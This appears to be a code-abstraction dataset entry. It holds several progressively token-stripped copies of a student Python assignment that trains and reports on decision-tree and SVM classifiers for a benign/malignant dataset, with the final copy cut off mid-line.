"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\n<function token>\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\n<function token>\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\n<function token>\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', 